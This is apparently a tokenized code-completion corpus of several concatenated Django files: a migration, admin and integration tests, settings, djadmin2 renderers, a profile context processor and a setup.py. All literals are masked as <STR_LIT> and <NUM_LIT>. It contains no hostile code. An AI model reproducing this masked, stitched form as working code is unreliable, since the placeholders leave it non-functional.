'<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . TextField ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT:description>' , models . TextField ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( related_name = '<STR_LIT>' , to = '<STR_LIT>' ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . OneToOneField ( related_name = '<STR_LIT>' , null = True , to = '<STR_LIT>' ) , <EOL> preserve_default = True , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( related_name = '<STR_LIT>' , to = '<STR_LIT>' ) , <EOL> preserve_default = True , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( related_name = '<STR_LIT>' , to = '<STR_LIT>' , null = True ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import six <EOL> from django . contrib import admin <EOL> from django . test import TestCase <EOL> class TestAdminSite ( TestCase ) : <EOL> def test_search_fields ( self ) : <EOL> """<STR_LIT>""" <EOL> for model , model_admin in six . iteritems ( admin . site . _registry ) : <EOL> for search_field in getattr ( model_admin , '<STR_LIT>' , [ ] ) : <EOL> model_name = model_admin . model . __name__ <EOL> self . assertFalse ( search_field . startswith ( '<STR_LIT>' . format ( <EOL> table_name = model_name . lower ( ) ) ) , <EOL> '<STR_LIT>' . format ( <EOL> search_field = search_field , model_name = model_name ) ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> BASE_DIR = os . path . dirname ( os . path . dirname ( __file__ ) ) <EOL> SECRET_KEY = '<STR_LIT>' <EOL> DEBUG = True <EOL> TEMPLATE_DEBUG = True <EOL> ALLOWED_HOSTS = [ ] <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> WSGI_APPLICATION = '<STR_LIT>' <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : os . path . join ( BASE_DIR , '<STR_LIT>' ) , <EOL> } <EOL> } <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> TIME_ZONE = '<STR_LIT>' <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> STATIC_URL = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import , unicode_literals <EOL> import os . path <EOL> from datetime import date , time , datetime <EOL> from django . db import models <EOL> from django . utils import formats , timezone <EOL> from django . utils . encoding import force_text <EOL> from django . template . loader import render_to_string <EOL> from djadmin2 import settings <EOL> def boolean_renderer ( value , field ) : <EOL> """<STR_LIT>""" <EOL> tpl = os . path . join ( settings . ADMIN2_THEME_DIRECTORY , '<STR_LIT>' ) <EOL> return render_to_string ( tpl , { '<STR_LIT:value>' : value } ) <EOL> def datetime_renderer ( value , field ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( value , datetime ) : <EOL> return formats . localize ( timezone . template_localtime ( value ) ) <EOL> elif isinstance ( value , ( date , time ) ) : <EOL> return "<STR_LIT::>" . join ( ( formats . localize ( value ) ) . split ( "<STR_LIT::>" ) [ : <NUM_LIT:2> ] ) <EOL> else : <EOL> return "<STR_LIT::>" . join ( value . split ( "<STR_LIT::>" ) [ : <NUM_LIT:2> ] ) <EOL> def title_renderer ( value , field ) : <EOL> """<STR_LIT>""" <EOL> return force_text ( value ) . title ( ) <EOL> def number_renderer ( value , field ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( field , models . DecimalField ) : <EOL> return formats . number_format ( value , field . decimal_places ) <EOL> return formats . number_format ( value ) </s>
<s> from __future__ import unicode_literals <EOL> from datetime import datetime <EOL> from django . contrib . auth import get_user_model <EOL> from django . contrib . auth . models import Group <EOL> from django . core . urlresolvers import reverse <EOL> from django . test import TestCase , Client <EOL> from django . utils . encoding import force_text <EOL> from . . models import Post , Comment <EOL> class BaseIntegrationTest ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . client = Client ( ) <EOL> self . user = get_user_model ( ) ( username = '<STR_LIT:user>' , is_staff = True , <EOL> is_superuser = True ) <EOL> self . user . set_password ( "<STR_LIT:password>" ) <EOL> self . user . save ( ) <EOL> self . client . login ( username = '<STR_LIT:user>' , password = '<STR_LIT:password>' ) <EOL> class AdminIndexTest ( BaseIntegrationTest ) : <EOL> def test_view_ok ( self ) : <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertContains ( response , reverse ( "<STR_LIT>" ) ) <EOL> class UserListTest ( BaseIntegrationTest ) : <EOL> def test_search_users_m2m_group ( self ) : <EOL> group = Group . objects . create ( name = "<STR_LIT>" ) <EOL> self . user . groups . add ( group ) <EOL> params = { "<STR_LIT:q>" : "<STR_LIT>" } <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) , params ) <EOL> self . assertContains ( response , '<STR_LIT:user>' ) <EOL> class CommentListTest ( BaseIntegrationTest ) : <EOL> def test_search_comments ( self ) : <EOL> post_1 = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> post_2 = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT>" ) <EOL> Comment . objects . create ( body = "<STR_LIT>" , post = post_1 ) <EOL> Comment . objects . create ( body = "<STR_LIT>" , post = post_1 ) <EOL> Comment . objects . create ( body = "<STR_LIT>" , post = post_2 ) <EOL> params = { "<STR_LIT:q>" : "<STR_LIT>" } <EOL> response = self . client . get ( <EOL> reverse ( "<STR_LIT>" ) , params ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> self . assertNotContains ( response , "<STR_LIT>" ) <EOL> def test_list_selected_hides ( self ) : <EOL> post_1 = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> Comment . objects . create ( body = "<STR_LIT>" , post = post_1 ) <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertNotContains ( response , "<STR_LIT>" ) <EOL> class PostListTest ( BaseIntegrationTest ) : <EOL> def _create_posts ( self ) : <EOL> Post . objects . bulk_create ( [ <EOL> Post ( <EOL> title = "<STR_LIT>" , <EOL> body = "<STR_LIT:body>" , <EOL> published_date = datetime ( <EOL> month = <NUM_LIT:7> , <EOL> day = <NUM_LIT> , <EOL> year = <NUM_LIT> <EOL> ) <EOL> ) , <EOL> Post ( <EOL> title = "<STR_LIT>" , <EOL> body = "<STR_LIT:body>" , <EOL> published_date = datetime ( <EOL> month = <NUM_LIT:5> , <EOL> day = <NUM_LIT:20> , <EOL> year = <NUM_LIT> , <EOL> ) <EOL> ) , <EOL> Post ( <EOL> title = "<STR_LIT>" , <EOL> body = "<STR_LIT:body>" , <EOL> published_date = datetime ( <EOL> month = <NUM_LIT:5> , <EOL> day = <NUM_LIT:30> , <EOL> year = <NUM_LIT> , <EOL> ) , <EOL> ) , <EOL> Post ( <EOL> title = "<STR_LIT>" , <EOL> body = "<STR_LIT:body>" , <EOL> published_date = datetime ( <EOL> month = <NUM_LIT:6> , <EOL> day = <NUM_LIT:20> , <EOL> year = <NUM_LIT> , <EOL> ) <EOL> ) , <EOL> Post ( <EOL> title = "<STR_LIT>" , <EOL> body = "<STR_LIT:body>" , <EOL> published_date = datetime ( <EOL> month = <NUM_LIT:6> , <EOL> day = <NUM_LIT:20> , <EOL> year = <NUM_LIT> , <EOL> ) <EOL> ) , <EOL> ] ) <EOL> def test_view_ok ( self ) : <EOL> post = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertContains ( response , post . title ) <EOL> def test_list_filter_presence ( self ) : <EOL> Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT>" ) <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> def test_list_selected_shows ( self ) : <EOL> Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> def test_actions_displayed ( self ) : <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertInHTML ( <EOL> '<STR_LIT>' , force_text ( response . content ) ) <EOL> def test_actions_displayed_twice ( self ) : <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> def test_delete_selected_post ( self ) : <EOL> post = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> params = { '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( post . pk ) } <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , params ) <EOL> self . assertInHTML ( <EOL> '<STR_LIT>' , force_text ( response . content ) ) <EOL> def test_delete_selected_post_confirmation ( self ) : <EOL> post = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> params = { '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( post . pk ) , '<STR_LIT>' : '<STR_LIT:yes>' } <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , params ) <EOL> self . assertRedirects ( response , reverse ( "<STR_LIT>" ) ) <EOL> def test_delete_selected_post_none_selected ( self ) : <EOL> Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> params = { '<STR_LIT:action>' : '<STR_LIT>' } <EOL> response = self . client . post ( <EOL> reverse ( "<STR_LIT>" ) , params , follow = True ) <EOL> self . assertContains ( <EOL> response , "<STR_LIT>" ) <EOL> def test_search_posts ( self ) : <EOL> Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> Post . objects . create ( <EOL> title = "<STR_LIT>" , body = "<STR_LIT>" ) <EOL> params = { "<STR_LIT:q>" : "<STR_LIT>" } <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) , params ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> self . assertNotContains ( response , "<STR_LIT>" ) <EOL> def test_renderer_title ( self ) : <EOL> Post . objects . create ( <EOL> title = '<STR_LIT>' , body = '<STR_LIT:body>' , published = False ) <EOL> response = self . client . get ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> def test_renderer_body ( self ) : <EOL> Post . objects . create ( <EOL> title = '<STR_LIT:title>' , body = '<STR_LIT>' , published = False ) <EOL> response = self . client . get ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> def test_renderer_unpublished ( self ) : <EOL> Post . objects . create ( title = '<STR_LIT:title>' , body = '<STR_LIT:body>' , published = False ) <EOL> response = self . client . get ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> def test_renderer_published ( self ) : <EOL> Post . objects . create ( title = '<STR_LIT:title>' , body = '<STR_LIT:body>' , published = True ) <EOL> response = self . client . get ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> def test_drilldowns ( self ) : <EOL> self . _create_posts ( ) <EOL> response = self . client . get ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> self . assertContains ( response , "<STR_LIT>" , <NUM_LIT:5> ) <EOL> response = self . client . get ( <EOL> "<STR_LIT>" % ( <EOL> reverse ( '<STR_LIT>' ) , <EOL> "<STR_LIT>" , <EOL> ) <EOL> ) <EOL> self . assertContains ( <EOL> response , <EOL> '<STR_LIT>' , <EOL> ) <EOL> self . assertContains ( <EOL> response , <EOL> '<STR_LIT>' , <EOL> ) <EOL> self . assertContains ( response , "<STR_LIT>" , <NUM_LIT:4> ) <EOL> response = self . client . get ( <EOL> "<STR_LIT>" % ( <EOL> reverse ( '<STR_LIT>' ) , <EOL> "<STR_LIT>" , <EOL> ) <EOL> ) <EOL> self . assertContains ( response , "<STR_LIT>" , <NUM_LIT:2> ) <EOL> self . assertContains ( <EOL> response , <EOL> '<STR_LIT>' , <EOL> ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> response = self . client . get ( <EOL> "<STR_LIT>" % ( <EOL> reverse ( '<STR_LIT>' ) , <EOL> "<STR_LIT>" , <EOL> ) <EOL> ) <EOL> self . assertContains ( response , "<STR_LIT>" , <NUM_LIT:1> ) <EOL> self . assertContains ( <EOL> response , <EOL> '<STR_LIT>' , <EOL> ) <EOL> self . assertContains ( <EOL> response , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertContains ( <EOL> response , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_ordering ( self ) : <EOL> self . _create_posts ( ) <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> model_admin = response . context [ "<STR_LIT>" ] . model_admin <EOL> response_queryset = response . context [ "<STR_LIT>" ] <EOL> manual_queryset = Post . objects . order_by ( "<STR_LIT>" , "<STR_LIT:title>" ) <EOL> zipped_queryset = zip ( <EOL> list ( response_queryset ) , <EOL> list ( manual_queryset ) , <EOL> ) <EOL> self . assertTrue ( all ( [ <EOL> model1 . pk == model2 . pk <EOL> for model1 , model2 in zipped_queryset <EOL> ] ) ) <EOL> self . assertEqual ( <EOL> model_admin . get_ordering ( response . request ) , <EOL> model_admin . ordering , <EOL> ) <EOL> def test_all_unselected_action ( self ) : <EOL> self . _create_posts ( ) <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( all ( [ <EOL> not post . published <EOL> for post in response . context [ "<STR_LIT>" ] <EOL> ] ) ) <EOL> response = self . client . post ( <EOL> reverse ( "<STR_LIT>" ) , <EOL> { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> } , <EOL> follow = True <EOL> ) <EOL> self . assertTrue ( all ( [ <EOL> post . published <EOL> for post in response . context [ "<STR_LIT>" ] <EOL> ] ) ) <EOL> response = self . client . post ( <EOL> reverse ( "<STR_LIT>" ) , <EOL> { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> } , <EOL> follow = True , <EOL> ) <EOL> self . assertTrue ( all ( [ <EOL> post . published <EOL> for post in response . context [ "<STR_LIT>" ] <EOL> ] ) ) <EOL> class PostListTestCustomAction ( BaseIntegrationTest ) : <EOL> def test_publish_action_displayed_in_list ( self ) : <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertInHTML ( <EOL> '<STR_LIT>' , force_text ( response . content ) ) <EOL> def test_publish_selected_items ( self ) : <EOL> post = Post . objects . create ( title = "<STR_LIT>" , <EOL> body = "<STR_LIT:body>" , <EOL> published = False ) <EOL> self . assertEqual ( Post . objects . filter ( published = True ) . count ( ) , <NUM_LIT:0> ) <EOL> params = { '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( post . pk ) , <EOL> '<STR_LIT>' : '<STR_LIT:yes>' } <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , params ) <EOL> self . assertRedirects ( response , reverse ( "<STR_LIT>" ) ) <EOL> self . assertEqual ( Post . objects . filter ( published = True ) . count ( ) , <NUM_LIT:1> ) <EOL> def test_unpublish_action_displayed_in_list ( self ) : <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertInHTML ( <EOL> '<STR_LIT>' , force_text ( response . content ) ) <EOL> def test_unpublish_selected_items ( self ) : <EOL> post = Post . objects . create ( title = "<STR_LIT>" , <EOL> body = "<STR_LIT:body>" , <EOL> published = True ) <EOL> self . assertEqual ( Post . objects . filter ( published = True ) . count ( ) , <NUM_LIT:1> ) <EOL> params = { '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( post . pk ) } <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , params ) <EOL> self . assertRedirects ( response , reverse ( "<STR_LIT>" ) ) <EOL> self . assertEqual ( Post . objects . filter ( published = True ) . count ( ) , <NUM_LIT:0> ) <EOL> class PostDetailViewTest ( BaseIntegrationTest ) : <EOL> def test_view_ok ( self ) : <EOL> post = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> response = self . client . get ( reverse ( "<STR_LIT>" , <EOL> args = ( post . pk , ) ) ) <EOL> self . assertContains ( response , post . title ) <EOL> class PostCreateViewTest ( BaseIntegrationTest ) : <EOL> def test_view_ok ( self ) : <EOL> response = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertNotIn ( <EOL> '''<STR_LIT>''' , force_text ( response . content ) ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> def test_create_post ( self ) : <EOL> post_data = { <EOL> "<STR_LIT>" : u'<STR_LIT:2>' , <EOL> "<STR_LIT>" : u'<STR_LIT:0>' , <EOL> "<STR_LIT>" : u'<STR_LIT>' , <EOL> "<STR_LIT>" : u'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> "<STR_LIT:title>" : "<STR_LIT>" , <EOL> "<STR_LIT:body>" : "<STR_LIT>" , <EOL> } <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , <EOL> post_data , <EOL> follow = True ) <EOL> self . assertTrue ( Post . objects . filter ( title = "<STR_LIT>" ) . exists ( ) ) <EOL> Comment . objects . get ( body = "<STR_LIT>" ) <EOL> self . assertRedirects ( response , reverse ( "<STR_LIT>" ) ) <EOL> def test_save_and_add_another_redirects_to_create ( self ) : <EOL> """<STR_LIT>""" <EOL> post_data = { <EOL> "<STR_LIT>" : u'<STR_LIT:2>' , <EOL> "<STR_LIT>" : u'<STR_LIT:0>' , <EOL> "<STR_LIT>" : u'<STR_LIT>' , <EOL> "<STR_LIT>" : u'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> "<STR_LIT:title>" : "<STR_LIT>" , <EOL> "<STR_LIT:body>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT:password>' ) <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , <EOL> post_data ) <EOL> Post . objects . get ( title = '<STR_LIT>' ) <EOL> self . assertRedirects ( response , reverse ( "<STR_LIT>" ) ) <EOL> def test_save_and_continue_editing_redirects_to_update ( self ) : <EOL> """<STR_LIT>""" <EOL> post_data = { <EOL> "<STR_LIT>" : u'<STR_LIT:2>' , <EOL> "<STR_LIT>" : u'<STR_LIT:0>' , <EOL> "<STR_LIT>" : u'<STR_LIT>' , <EOL> "<STR_LIT:title>" : "<STR_LIT>" , <EOL> "<STR_LIT:body>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , <EOL> post_data ) <EOL> post = Post . objects . get ( title = "<STR_LIT>" ) <EOL> self . assertRedirects ( response , reverse ( "<STR_LIT>" , <EOL> args = ( post . pk , ) ) ) <EOL> class PostDeleteViewTest ( BaseIntegrationTest ) : <EOL> def test_view_ok ( self ) : <EOL> post = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> response = self . client . get ( reverse ( "<STR_LIT>" , <EOL> args = ( post . pk , ) ) ) <EOL> self . assertContains ( response , post . title ) <EOL> def test_delete_post ( self ) : <EOL> post = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> response = self . client . post ( reverse ( "<STR_LIT>" , <EOL> args = ( post . pk , ) ) ) <EOL> self . assertRedirects ( response , reverse ( "<STR_LIT>" ) ) <EOL> self . assertFalse ( Post . objects . filter ( pk = post . pk ) . exists ( ) ) <EOL> class PostDeleteActionTest ( BaseIntegrationTest ) : <EOL> """<STR_LIT>""" <EOL> def test_confirmation_page ( self ) : <EOL> p1 = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> p2 = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> post_data = { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ p1 . pk , p2 . pk ] <EOL> } <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , <EOL> post_data ) <EOL> self . assertContains ( response , p1 . title ) <EOL> self . assertContains ( response , p2 . title ) <EOL> def test_results_page ( self ) : <EOL> p1 = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> p2 = Post . objects . create ( title = "<STR_LIT>" , body = "<STR_LIT:body>" ) <EOL> post_data = { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ p1 . pk , p2 . pk ] , <EOL> '<STR_LIT>' : '<STR_LIT:yes>' <EOL> } <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , <EOL> post_data , follow = True ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> class TestAuthViews ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . client = Client ( ) <EOL> self . user = get_user_model ( ) ( username = '<STR_LIT:user>' , is_staff = True , <EOL> is_superuser = True ) <EOL> self . user . set_password ( "<STR_LIT:password>" ) <EOL> self . user . save ( ) <EOL> def test_login_required_redirect_to_index ( self ) : <EOL> index_path = reverse ( '<STR_LIT>' ) + '<STR_LIT>' <EOL> target_path = reverse ( '<STR_LIT>' ) <EOL> self . assertRedirects ( self . client . get ( target_path ) , index_path ) <EOL> def test_login_required_logined_successful ( self ) : <EOL> index_path = reverse ( '<STR_LIT>' ) <EOL> self . client . login ( username = self . user . username , <EOL> password = '<STR_LIT:password>' ) <EOL> self . assertContains ( self . client . get ( index_path ) , <EOL> reverse ( '<STR_LIT>' ) ) <EOL> def test_change_password_for_myself ( self ) : <EOL> self . client . login ( username = self . user . username , <EOL> password = '<STR_LIT:password>' ) <EOL> request = self . client . post ( reverse ( '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : self . user . pk } ) , <EOL> { '<STR_LIT>' : '<STR_LIT:password>' , <EOL> '<STR_LIT>' : '<STR_LIT:user>' , <EOL> '<STR_LIT>' : '<STR_LIT:user>' } ) <EOL> self . assertRedirects ( request , reverse ( '<STR_LIT>' ) ) <EOL> self . client . logout ( ) <EOL> self . assertFalse ( self . client . login ( username = self . user . username , <EOL> password = '<STR_LIT:password>' ) ) <EOL> self . assertTrue ( self . client . login ( username = self . user . username , <EOL> password = '<STR_LIT:user>' ) ) <EOL> def test_change_password ( self ) : <EOL> self . client . login ( username = self . user . username , <EOL> password = '<STR_LIT:password>' ) <EOL> new_user = get_user_model ( ) ( username = '<STR_LIT>' ) <EOL> new_user . set_password ( "<STR_LIT>" ) <EOL> new_user . save ( ) <EOL> request = self . client . post ( reverse ( '<STR_LIT>' , <EOL> kwargs = { '<STR_LIT>' : new_user . pk } ) , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertRedirects ( request , reverse ( '<STR_LIT>' ) ) <EOL> self . client . logout ( ) <EOL> self . assertFalse ( self . client . login ( username = new_user . username , <EOL> password = '<STR_LIT>' ) ) <EOL> self . assertTrue ( self . client . login ( username = new_user . username , <EOL> password = '<STR_LIT>' ) ) <EOL> def test_logout ( self ) : <EOL> self . client . login ( username = self . user . username , <EOL> password = '<STR_LIT:password>' ) <EOL> logout_path = reverse ( '<STR_LIT>' ) <EOL> request = self . client . get ( logout_path ) <EOL> self . assertContains ( request , '<STR_LIT>' ) <EOL> index_path = reverse ( '<STR_LIT>' ) + '<STR_LIT>' <EOL> target_path = reverse ( '<STR_LIT>' ) <EOL> self . assertRedirects ( self . client . get ( target_path ) , index_path ) </s>
<s> DEBUG = True <EOL> TEMPLATE_DEBUG = DEBUG <EOL> ADMINS = ( <EOL> ) <EOL> MANAGERS = ADMINS <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> TIME_ZONE = '<STR_LIT>' <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> SITE_ID = <NUM_LIT:1> <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> MEDIA_ROOT = '<STR_LIT>' <EOL> MEDIA_URL = '<STR_LIT>' <EOL> ADMIN_MEDIA_PREFIX = '<STR_LIT>' <EOL> SECRET_KEY = '<STR_LIT>' <EOL> TEMPLATE_LOADERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> TEMPLATE_DIRS = ( <EOL> ) <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> AUTH_PROFILE_MODULE = "<STR_LIT>" </s>
<s> from profiletools . utils import get_my_profile_module_name <EOL> def fetch_profile ( request ) : <EOL> """<STR_LIT>""" <EOL> context = { } <EOL> if request . user . is_authenticated ( ) : <EOL> profile_module_name = get_my_profile_module_name ( ) <EOL> profile = getattr ( request , profile_module_name , None ) <EOL> if profile != None : <EOL> context [ profile_module_name ] = profile <EOL> return context </s>
<s> import os <EOL> import sys <EOL> try : <EOL> from setuptools import setup <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> version = "<STR_LIT>" <EOL> if sys . argv [ - <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> try : <EOL> import wheel <EOL> except ImportError : <EOL> raise ImportError ( "<STR_LIT>" ) <EOL> os . system ( '<STR_LIT>' ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" % ( version , version ) ) <EOL> print ( "<STR_LIT>" ) <EOL> sys . exit ( ) <EOL> if sys . argv [ - <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> print ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" % ( version , version ) ) <EOL> os . system ( "<STR_LIT>" ) <EOL> sys . exit ( ) <EOL> readme = open ( '<STR_LIT>' ) . read ( ) <EOL> history = open ( '<STR_LIT>' ) . read ( ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def get_requirements ( filename ) : <EOL> f = open ( filename ) . read ( ) <EOL> reqs = [ <EOL> x . strip ( ) for x in f . splitlines ( ) <EOL> if not x . strip ( ) . startswith ( '<STR_LIT:#>' ) <EOL> ] <EOL> return reqs <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = version , <EOL> description = """<STR_LIT>""" , <EOL> long_description = readme + '<STR_LIT>' + history , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> include_package_data = True , <EOL> py_modules = [ '<STR_LIT>' ] , <EOL> license = "<STR_LIT>" , <EOL> zip_safe = False , <EOL> keywords = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
